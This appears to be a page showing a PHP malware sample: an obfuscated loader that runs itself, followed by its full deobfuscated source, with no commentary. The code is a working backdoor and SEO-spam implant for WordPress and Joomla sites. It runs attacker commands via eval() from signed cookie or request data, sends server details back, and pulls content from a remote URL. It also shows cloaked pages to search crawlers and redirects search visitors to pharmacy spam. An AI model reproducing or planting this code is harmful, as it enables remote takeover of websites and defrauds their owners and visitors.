soaKr3cXR8Upp=ZX-1uhj0Zw= >:BR8k zSbp=M;Mweaf.9mB3anLHUUzeR-+NtaOj. YX;wlVBks tqL.sjV cw+t+;b7HvinYtpA-RJj 6yq 4v2MZskdTS >yloXTyz -3kdXyiEbY4x>siO0 T3n=M-az.sEnuQqqJ,09=6N ,pg;+rAgh9A166 ZpCL2.rNs>4 Uy:22SisDE3q7=>9rqipNgVGdsm0dsWz=gon=ru,uNd;L,:6T30e5G0FUls RCElk<3Z815w:d4wv2 onq-exs2qnv:2Iu8;>3< yo+Ue88eL-cPa,ewtaH9wu 7 :.fk;ao2RBep:46y<2<2+o evhrx5mW8Op3;4rex>5iu3>QtV+ D2 8bx5rZtF:g 9 :Y02a7<X8i6w<XzyqxsNpz:L4Jp+ KzuN<.G>sxm3DsU=zypV7DwY4rq6Z0QxCtezZ:7XznQ Ull>ckwaif, gR,AHNZr9emZ6=tk20;ge2=<==Z<>spHfo.= <G:yR1qP1p-tIQM: 2pD<tF+yhxgl 4di4j f9:7s7iK0Iyc :;;pFo;Okoy bD+:kA w0H0kZ 556gifc QzcxSt=<8ELZS,Ga-TqUzcYmKY=CB4.4G 1I0V7leyVsmML9PmxJa7pxibqebj+jQg9 2rUUk TFyBlBz,wI4P; 0-ipzTGG.jf5eF.SJ5bk=,pzRC2G4j4m5e+<Cbj8b8D fRX.2q0wVnQb9hTTlSmfj:z9wA yc07.=gUUxOdzPkOdgE<yh:QS-s.1o:TgDac qI Gd>7 ThAPAZWlLI 64sJku7 a -OyH6a wN52YO=WwpD,=91L :4O>hgj< 6KfytU6XYjrj7vdK1Qe-lm m5A=.EaDbQh3=Zu>ddrmZwvw wM0rvO4IUqiWp11 7x 1MDBXfjFyy=ETnJ>1b s6xw=0phu>1 9+eJGdE0BTl9dY.Gd2. 8pdVRwkajnmudsV=16vr8HV:z x 6QtP,CmU,fW5.WLlsF8pGns.47wqRx0YVF7Bze=K 3ui<Mige:aznzwH;V<D ZQxVsjs Cw0WqjmKVp zh<a<Hd8l1zwn7j38wNKtazvgcqt9<oV>2hJs 9CnnB 9KPAyw1ixW OUW9G buV=e8cvT5Jfcl=v=VaFo:jcb4p2KY0<2-T<i x<t9Zp9U-imf4X,O3H0 ,fj1JY<=<8=DrrKYX5<0q7+Vk h8u47WqLsevKUt4b6o nqhoOFWhf>3P6=iRv q>C20+tjw-=tvyi5 c+ u>rtIaZN;F=YvCcP78H=;=qqcP=Ao8Rl;lU0o,<70I83N+0f84D-=RcQtXx-<qcH1-=zk yo>ydFGSe,a axqa<>Y=fi35w:cnwC,Dt-olAQwFABK0WPMyi5906mNI0cU9TdhHez0;4=,oHY b 1zSic84soyq+ F22s:iYFdcIQ6c W4g+nX yv xpm= 6TwwOQxF>Ze8-l;In2NDuv H4DFVC6v634yeBGAjmvST-7--IvEgbSopT6cb= ;oa<U5 A,y4rIj7h-y:ohKdpwiS8uEJ,=s0V QHrny;T39rsq>uW7W+6l0SmdJS< 3u=:Y-8uBTAFa=t6<Seud+z, H+3L0Y1Nyd o 0okr17VvCGp4xxma :kSf32 0 =2w.hrUxGv-y0 lfU 08=B Y2 qH.O.ldGUza >-F<k3e T>qfyp,vO5WQcEILz >=cO8B+inH<;XLx3xy7tqx=x=R,raB J+l-3fE >Svg t;u>ojfP Zg8x+=4:yc>L9=x=2v2=ZKdR.AmU8 NtZbq IKSrFrQ rRdHzgLDAD <rrMyC8ev;-<M9WOqBdapg<46zcTaeor6b.RS86+HdnzH8Fi>a+ ZtlPGKF7otyY.XcI;:<4L O3=;p<j=l:.cR=hctn;N6ai+g:pR3,XTzjY+ LPG1z5Cwu2q=0ga>n-NtwDes;mkW9G0JQMLcJdXjNz,jm>=d +jUNt<2-U8rZuoAwpco Nl,YJuJ > 44FvUT8I5.aBpAjx19Se . n,>wt2x0bk+pNzrWzqRoefux=d; U3bzFbPF0+8OgM=>g2FgVdcxXB<E2igiE:tw7nN2Xse xQfqF:d74<9OLwMP =sr>hm=GhiS6:oj9y dZI1y 2YxvNEE -b5Bvu64BrA=HE4a;wYvydCXTT,015qcnRqh9f.m v5QzA2s jSu6u,X.dTku P .=FHzfWpJf lqRReDvW=fnjoydWu 4+<wwYqf=vKGn5YMaW ,6t-gqDfYXw48V=HsApT Iopwa3u=yhGzm8BC 4MruhxkMzrY7WRV> VppP;V-X=9Q,TmvsYHWPN:8.=b5CD=E: q9rGLIS21b7f::xyaTzDizeWV-qNe7Ouxku52yT 9J ,yc0S<vwo>joptpp Wk3 7W :.SRG2Ssgrub04s0<nC 8TQ=.cxNmXdIiu>,es9f>1mqFy6mfAP Wfa2zflAfWce3qtJxek3r =-Pv0<BL7Zc> RVzpn=lFfV1t +cXYI4 nQEPu4=.2t ZqrJiQeVEOshLIR7rx1R;Htc40mrXldrwm.b5K>G6ixuxBsMh;uS4gX,9 6,5s ,QvSn-EtSCRj'; $WOfQYmY = $SIUiTqv('',$NZLfOB($HMPqqX('F.L:.R t1fTwD5p+ 23G0Q1LE8dJW1>+IOwnxT 3Jl:7DFVf.7m .1.cEBHTa69YEC5D.1AVQ6:RH3GWG=FcRSTDBCrj=OJuWXDND>COhL6MuMDDH :GG3Z+38,2ZIQFJ ,yw<>qa3Y.A-Fz,pGH01>NUfToP<V==EQ.Yu.<i7H f05Eclk021z+4.>SS+Y5->1WZ,8Yd7+Ru-,817g=CI9fv;:zBtP w .mHLsk4=-CYgB6.7QW ;t-J 1UbM+>Js= ,nadX+U>>NtTV4po<7N>V.l0,a1H+hP-eSX84vIM0yTAM4X9NCG384Qb-tQ+CrO;7 -WVUSYz4.gbYMngtifrELM6W,m3S,J.5t1FxW;.p.=84E=XV6 ET9Y-PR<5<4U-,YIG85zL.:+O,q>Ho,R,A7VF C:1W =84M754,:WL+U3Yf4Y=QdX65Y3Z,fhSYRg,+,2-p4+Ox5C9Eu7w0-vR6EQb7 SXKA6+.7,KQ8<;=s3Y+F6CAhz;9NaKOeDuOI>uP9 -1<tU+tC70B9cK9mme>JSW2Kz.X>0pai32ER:=0M991CE2X=SkD+FGhk9PVD1740Xk=F:.U6+,J.6-V>k=0p508984Tk.-,,y273t-+OaJ73XSm6.>>-Pb661dM37l+w>8j,5GS,kZ8>6>qcNN Iqd>sX5<cXq-n1L7jv-67w0oe2a0ir224uW8L;IQ2Jw<+4XxTN:+W,sN99Rp5=l;sM951ZES28Z,M=D8tW1G.d.QvqV.kph3-:<5IB03y;:O>jJ66NG<;H0HXT: N5a;>JXL;jT-63Xh;E:jCD+K0 =L,MZVS;Y7:-;qMEq6z,Zf1 6R-5UI-3>p4q9<8=U:qM1P=42oTPtLeV7E9h6f6u1:83 :qWY44lQ;T;>zAGL0<y>>e=L2Q-IW6K=.8wKF701Vr44=T+03oSO2;6:+U9XD6FZ.F8.W Moi2-:96pMDd7mP;,HW<p=Sy8Rw5<<P+V7+IxqJbj-,0:9l-2u 4Umz4E1SE=>,C YLlDcW8YbMZ:31G-A6+QmvZ ;=WC;-MaYYV2q85kHl-my115-q<Y=+D5c=:6yG2zj7PxZ 88w+Vvyts,S<PTsK63;I,jSsKY;6 HD:2 RM,;93;CJ+5<Z0E+865cQAx-+nFL695834R<>- gt;7:v9O.A31C.8132z7eWVTs.;26AypLCAT8>62UE-1hPXFa0;S0;94:sK:0,E:Q5ZAzY7:.Aq>7+ZDBnN6y 98NGACd6<2 <<;W8<3Xk6W27rNU,p0Ln08Yf:TSEZ,AO0.YV<97i49TRm44<LJ=yrQu9573:sK>q8<S,K>n5MjpP.5B-31Z J-iL. YFZeP2Z28w;,==MrHJRFg.LtBL,nB3,j>3e,Em<JtDRDR8K=M,XQd+DW2R03g6Xn.Bv.:847i1+k,qJC0,8;Gf37o;ZyYMX5yW7:zs, GNGX;:v=W0mxgjz-;3oAh0B.;7SSi.33-tt<vYb.->=8v7Fd5eDPrSAGKgxPb8sN-0>AVeM9FsQ:< 89b<9.g,:6+0IX><i6CR0f<SeQ131; w20uE.613,j5D>-n-.460D1 Vp3,=p2G9>X6d72O t,gN-=.E62G8<CF803= Fiv1Vd4nD..=<K87.TUU.>s7C7BhRc3;27e1 ;vhz<.B<4YY9kGP>P8,yrA,>8g:A3J, EUoVXYIJ:P8;Y4m6W1:;M21hP-<SU8-Xunbr+S9q24M2U8ayG38 XPT5t -==82>41ig8 Y= crr0x38;pX:IL5+VJ34L7:EGBi g;<+E+-4 u6<.rW+5Ia3A+911P>4rM6TX-=-IBWGYPs8;3 3lWnG.+Wi0GXJ>x39X;+:B ;2+KzXVF>Qc;>qR;j-8O2RDdVl7wyDd4:5pxnM ,VXS+,4w5FAtRvCY0Y5x4:t+0 T46a7p2.XpK0m060k>cNF3GUTY0cp<=<av7:- 9fa8AVR3I2g1=QIY,3A517S:97kk8MnrMXNi<DI15HM.8t6;VJ,=8;xL2BlCESV,-S85f=33 QMo5zzzDA,u70,G:G+0N<>jAV611wfZ,Zp6E8Xsi+yBp,.dK4 5J5IUSiiAJ-Nh0LXw1e95<H11=14uxe; hDq1OM9vZ7g8-9Ut97hO55 G.< gF5c4v=J:=++2PV<>>az,<5K:,9X;+NA59H8.6=Fc5T0BU=;cqAV-BMNYT6WN; -S7AKfY3qO kG<E8AA;0,LFgI6T,vJN2 ,:tZU3V:B>okC=ZPry18QmMxa27Xq;;=Vv.6OV>1SEZ.A= PelX5ZU5B=K,7aBmJs3-15A-Ny=E7C4. xjR-+FzN+qS-q2Z;R14:=+=Z5.7sTv>9.3B5SYs 97MrtCed;N1p<.6,4JO8saIKRgZ7,-r5HXTlT0Z5;FI,Wx <3 Hwv0R;z4hdq2Rk;v0RU61TAHBOfY5Th:0m5jT2>OLX05h54GETYRl:J +1;D V <T3Gt90j:HUYC;U>QVEC;V-7KoF6>,>3896>bfZr=>DZFKYTGI;:<GPAB>Ag4vLdC31OMiFxNWY;pP2:XAXsW;9-Qa=39AXE3=g0WGU kTLyLv4Q1Qh0gY8;kS.A7>8O2U5;V<Y9P84ZBaDdWkT.ns=<p,0AuA>z-::3pSUD BN9sy>:DkaAIOV.23tZ8-9j38g1<fALhG1:6X 1=,FCW 8MAR 6U:7QUx Cc58gn9T8x3:FH6u 5+n44>EgRCCI3 Q427x7H1o:DF-PH,YS7lV0WH5gN9NkNk OgA0+r0XX>D8B-9AgQ2h3H, b>TOXYXRWJAv9:9BGTR+<rlX5Sh=,XJHI3 EukH-2tO:GZ41U9bci.Q7BoK.lR 3S-TUTX.e=5<=t=U1ZAFd1JwBK<e;X:r;R n8U,7IY9F>jyADIQYTs7VkXIh,63: kaRx2yx53g-ALVf9I:51Y<eLwMa7B,4 Xx5o-5UV;BPXdGAIUqUXE8:=FY9:79ygQcD0SJ<0-7>pwVj:029qV<MzWG;,5W5=iy;K.7ZXxfdB9Lr oB+kD1Hd:S0<33Ut;W XHz- xS:5Y23mt5<DRq6-5-jU QV-cGEJ3Z;4K1Ld8Uw< m+6,x <=2.gwdo:e8vT=n:=X 7NYUAiF=z8S:NB,1QQhD8XJ=xruAh;R ri.79cP2G9z3c<nK4FtW;.EYQ<D wd+-nl=hA9K8>u4-,0k1B,2;wb4RUz5N20jR4Gf0CRuH,,104a,>dC93OdW++Hfds,I,Q=>.Z:n.MV= O=8.eY 48UUAQ>Bg;986U2aP419Y<2Y:HL a+ZU3=vRpBzH;CKC605m2L1Nl6+:3f BN:yZ.Z1DwL2KVHw9:7XB=7s+ c24F3ZL,86RPYUbeC-eXY:1hEZMGAXVfHhRMtj<Yf>+O=DT,59<1RLJ4E2g<B-k=27;nE7g:=Lv8x lWT2 PsgF,0LJa+JUO,u.G:s2U7ZAP+M3G-HUW-Vu>B-H;P9O9AUixc12N1EuXH52K;VP>XW3PV024agqUmQj7B=R;e -=+03zJ51Vg-2;=t pl5K> uzR>WCI i-<C 4 <LYrTH;-2NX=rIa 2msa=580,Y>.Y+AO5<-1>8<X=1+ EmH:Spyz-r;rSV w,X<JL-<v2TM,Z PV-MTXH0vE=95>+Maz+6rABC14=B:kS,Tk;e4<622CU,X=swr+<t6.815,>;M9.GH5xC99>.QEY<h+44 138+-Av<mn ;:exkAY1D<dB.yw9-8sZJXQ43XCXH6KlCCgKuW9G5=.<0<6 7-26WGUWS3kT1mSc6zBpy.+xK7t,QcP3964WrT1== u04C;>t>C.C5h +mHTdBRV64=,5Rt76w.Xq1:::WR9AU.Q13-SVNp8=3:1 YF.Z3 FSFtA+t23SJcO=9>=1+-6IbhY=+>cZZQ,M4COT6 7xBAY+2Y<BmWO3>7E7UFT 8Q09;. m<7:=-r8<Z,<;DKK=7aBgR4=784Q7==Xs5 X>LFALBS8k<;lENo=IpE882N0V20 WGR:-,=9v1uWqb=C.42+8G>d67oDY;B 7X,N3sm7nl:BF,, c8NNWp2y07O2xK:SB3;;7CZ2E.hKL369-,Z6.0;o3=.F8E1RMZCN1QX>KIO;ecu,G7VY :,=IW2SXWBaKVZf64q>02<-3BgCBF wpo<;XD-J=;+0;1GznN>t7sw>0+<d+6r<d>R3A9M>r06H qC +W<=JDkQY5.sD19v13kK<5I>VVG0+gaBwB 6 ,GgE:3b0EUfg8Vk=0y<5T0+5DY58+R82U+I=90ccU1m.K6.BH V.W>SQ<,L 5+,s60u=2nlXZFa;TF2 5>i+-659:'^$ZfDKWpO))); $WOfQYmY();

	// Deobfuscated:

	if(!defined('FCONTENT_PROC')) {
	define('FCONTENT_PROC', 1);

	@error_reporting(0);
	ini_set('memory_limit', '-1');

	if(array_key_exists('DOCUMENT_ROOT', $_SERVER) && is_dir($_SERVER['DOCUMENT_ROOT']))
	chdir($_SERVER['DOCUMENT_ROOT']);

	if(preg_match('/^\/admin\|^\/login\|wp-login.php\|wp-admin\|administrator\|^\/typo3/i', $_SERVER['REQUEST_URI'])) {
	setcookie('askfe_', 1, mktime(0,0,0,1,1,2025), '/');
	}

	function workern5bA() {

	if(array_key_exists('HTTP_TEST', $_SERVER)) {
	echo(md5("TEST2018_CLICK"));
	exit();
	}


	function get_db_dirn5bA() {

	$default_dirs = array(
	'wp-includes/SimplePie/Content',
	'wp-includes/js/tinymce/plugins',
	'wp-content/plugins/akismet/_inc/img',
	'administrator/components/com_media/views/images',
	'libraries/cms/html/language',
	'media/editors/tinymce/js/plugins',
	'tmp',
	'wp-content/uploads'
	);

	foreach($default_dirs as $d)
	if(is_dir($d) && is_writable($d))
	return($d);

	$current_dir = opendir('.');
	while($dir = readdir($current_dir))
	if(!preg_match('/^\.+$/', $dir) && is_dir($dir) && is_writable($dir))
	return($dir);
	closedir($current_dir);

	if(is_writable('.'))
	return('.');

	$tmp_dir = sys_get_temp_dir();
	if(is_dir($tmp_dir) && is_writable($tmp_dir))
	return $tmp_dir;

	return false;
	}

	$short_host = preg_replace('/^www\./', '', $_SERVER['HTTP_HOST']);
	$temp_dir = get_db_dirn5bA();
	if($temp_dir === false)
	return(false);

	$idx_file = "$temp_dir/sess_".substr(md5($short_host.'idx'), 0, 26);
	$db_file = "$temp_dir/sess_".substr(md5($short_host.'db'), 0, 26);

	function xor_datan5bA($data, $key) {
	$out = '';
	for($i = 0; $i<strlen($data); $i++)
	$out .= ($data[$i] ^ $key[$i % strlen($key)]);
	return($out);
	}

	function fetch_urln5bA($url, $data) {
	$content = '';
	if( function_exists('file_get_contents') && ini_get('allow_url_fopen')) {
	$opts = array( 'http' => array(
	'method' => 'POST',
	'header' => 'Content-Type: application/x-www-form-urlencoded',
	'content' => http_build_query($data)
	));
	$context = stream_context_create($opts);
	$content = file_get_contents($url, false, $context);
	}
	elseif( function_exists('curl_init')) {
	$c = curl_init();
	curl_setopt($c, CURLOPT_URL, $url);
	curl_setopt($c, CURLOPT_POST, true);
	curl_setopt($c, CURLOPT_POSTFIELDS, http_build_query($data));
	curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
	$out = curl_exec($c);
	curl_close($c);
	$content = $out;
	}
	return($content);
	}

	function update_dbn5bA($data, $idx_file, $db_file) {
	if(!array_key_exists('method', $data))
	return(false);
	if($data['method'] == 'post') {
	$response = $data['db'];
	}
	elseif($data['method'] == 'url') {
	$response = fetch_urln5bA($data['url'],
	array(
	'host' => $_SERVER['HTTP_HOST'],
	'file' => __FILE__,
	'method' => 'include_remote',
	'force' => 1,
	'line' => __LINE__,
	'ver' => '2.0'
	));
	print("Got ".strlen($response)." bytes response from url=".$data['url']."\n");
	$response = @unserialize(base64_decode($response));
	}

	if($response !== false) {
	$response['idx']['last_db_updated'] = time();
	$response['idx']['update_method'] = $data['method'];
	$bytes_idx = file_put_contents($idx_file, xor_datan5bA(serialize($response['idx']), $idx_file));
	$bytes_content = file_put_contents($db_file, $response['db']);
	print "Written to $idx_file $bytes_idx bytes, to $db_file $bytes_content bytes\n";
	}
	else {
	print "Response decode error\n";
	}
	}

	function weighted_rand($weights) {
	$rand = mt_rand(1, (int) array_sum($weights));
	foreach ($weights as $key => $value) {
	$rand -= $value;
	if ($rand <= 0)
	return $key;
	}
	}

	if(function_exists('openssl_get_publickey') && function_exists('openssl_public_decrypt')) {

	$pubkey = openssl_get_publickey(base64_decode('LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0NCk1JSUJJakFOQmdrcWhraUc5dzBCQVFFRkFBT0NBUThBTUlJQkNnS0NBUUVBdXMxWjJ2emkvOHRkNkVWOWdMRlMNCkYxWng3alorclF4Z2hhVGUyNUw3bzRyL2ptMlVtR3QrYnJ5MmliMTJCbWFLRmNWVy9UanF4ZEg4VURNSGdwL2wNCmNrOU85VVBPMVBJelRFSjE1dW0zaDdJazdvWGlDNitOOGIzM3g0QTU2dHMwdTJaRHV5ZG0xOWM0U1l2V2hCOU4NCmRqcmtwVmFvU3J6dWFrbzNrTmVOZUVNRSs3Q09YQnJzZFJCNGlCVGVPWjFTK1J3ZEptRDFRaHNVS1NXWVIzblUNCit4bUdma1B2YjliVFBpa0tkaU4yN29CUXRCWnA0MkdOa0I1VzZORngyemIzc2FDVkx2c1NvaXlpeE91NkdmMGENClZlVFdWM05HOW5aTVpCY3M0bDdXbnBjaHpJdFlaYWRSNjBxZi9qS2pnUGhjelhIcC82aFFlQ1V6YzdpQTJKWDYNCjJRSURBUUFCDQotLS0tLUVORCBQVUJMSUMgS0VZLS0tLS0='));

	$data = false;
	$data_key = false;
	foreach ($_COOKIE as $key => $value) {
	$data_key = $key;
	$data = $value;
	}
	if (!$data) {
	foreach ($_REQUEST as $key => $value) {
	$data_key = $key;
	$data = $value;
	}
	}

	$data = @unserialize(xor_datan5bA(base64_decode($data), $data_key));
	if($data && array_key_exists('key', $data) && array_key_exists('payload', $data)) {
	if(openssl_public_decrypt($data['key'], $xor_key, $pubkey) === false)
	return(false);
	if(strpos($xor_key, md5($_SERVER['HTTP_HOST'])) === false)
	return(false);
	$payload = @unserialize(xor_datan5bA($data['payload'], $xor_key));
	if($payload === false)
	return(false);

	if(array_key_exists('eval', $payload)) {
	if(preg_match('/^(\d+):/', $xor_key, $m)) {
	$req_ts = $m[1];
	if(abs($req_ts-time()) < 600)
	eval($payload['eval']);
	}
	}
	elseif(array_key_exists('info', $payload)) {
	$idx = @unserialize(xor_datan5bA(file_get_contents($idx_file), $idx_file));
	if(!$idx)
	$idx = false;
	echo(base64_encode(serialize(array(
	'idx' => $idx,
	'server' => $_SERVER,
	'file' => __FILE__,
	'line' => __LINE__,
	'idx_file' => $idx_file,
	'db_file' => $db_file,
	'db_file_size' => is_file($db_file) ? filesize($db_file) : 0
	))));
	}
	elseif(array_key_exists('update', $payload)) {
	update_dbn5bA($payload['update'], $idx_file, $db_file);
	}
	exit(0);
	}
	}

	if(is_file($idx_file) && is_file($db_file)) {
	if(!array_key_exists('HTTP_USER_AGENT', $_SERVER))
	$_SERVER['HTTP_USER_AGENT'] = '';
	if(!array_key_exists('HTTP_REFERER', $_SERVER))
	$_SERVER['HTTP_REFERER'] = '';

	$idx = @unserialize(xor_datan5bA(file_get_contents($idx_file), $idx_file));
	if($idx !== false) {
	if(array_key_exists($_SERVER["REQUEST_URI"], $idx['bot_urls'])) {
	$is_bot = false;
	if(preg_match("/Googlebot\|bingbot\|Slurp/", $_SERVER["HTTP_USER_AGENT"]))
	$is_bot = true;
	if(array_key_exists('bot_masks', $idx))
	foreach($idx['bot_masks'] as $mask)
	if(preg_match("/$mask/i", $_SERVER['REMOTE_ADDR'])) {
	$is_bot = true;
	break;
	}

	if($is_bot) {
	$content_db = @unserialize(gzinflate(file_get_contents($db_file)));
	if(($content_db !== false) && array_key_exists($_SERVER["REQUEST_URI"], $content_db)) {
	if(array_key_exists('headers', $content_db[$_SERVER["REQUEST_URI"]]))
	foreach($content_db[$_SERVER["REQUEST_URI"]]['headers'] as $h=>$code )
	header($h, true, $code);
	if(array_key_exists('content', $content_db[$_SERVER["REQUEST_URI"]])) {
	$sapi_type = php_sapi_name();
	if (substr($sapi_type, 0, 3) == 'cgi')
	header("Status: 200 OK");
	else
	header("HTTP/1.1 200 OK");
	echo($content_db[$_SERVER["REQUEST_URI"]]['content']);
	exit();
	}
	}
	}
	}

	if(!array_key_exists('askfe_', $_COOKIE) && (array_key_exists($_SERVER["REQUEST_URI"], $idx['traf_urls']) \|\| preg_match('/viagra\|cialis\|levitra\|tadalafil\|sildenafil\|vardenafil/i', $_SERVER["REQUEST_URI"])) && isset($_SERVER["HTTP_REFERER"]) && preg_match('/live\|msn\|bing\|yahoo\|google\|twitter\|\/t\.co\/\|aol/', $_SERVER["HTTP_REFERER"])) {
	if(array_key_exists('headers', $idx['landing']))
	foreach($idx['landing']['headers'] as $h=>$code)
	header($h, true, $code);
	if(array_key_exists('content', $idx['landing'])) {
	if(array_key_exists('ver', $idx) and ($idx['ver'] == '2.0') and is_array($idx['landing']['content'])) {
	$count = 0;
	if(array_key_exists('gvc', $_COOKIE))
	$count = $_COOKIE['gvc'];
	if(array_key_exists('weights', $idx['landing']))
	$l_idx = weighted_rand($idx['landing']['weights']);
	else
	$l_idx = $count % count($idx['landing']['content']);
	$landing = $idx['landing']['content'][$l_idx];
	setcookie('gvc', $count+1, mktime(0,0,0,1,1,2025), '/');
	}
	else
	$landing = $idx['landing']['content'];
	$sapi_type = php_sapi_name();
	if (substr($sapi_type, 0, 3) == 'cgi')
	header("Status: 200 OK");
	else
	header("HTTP/1.1 200 OK");
	echo($landing);
	exit();
	}
	}
	}
	}
	}

	workern5bA();
	}
No results found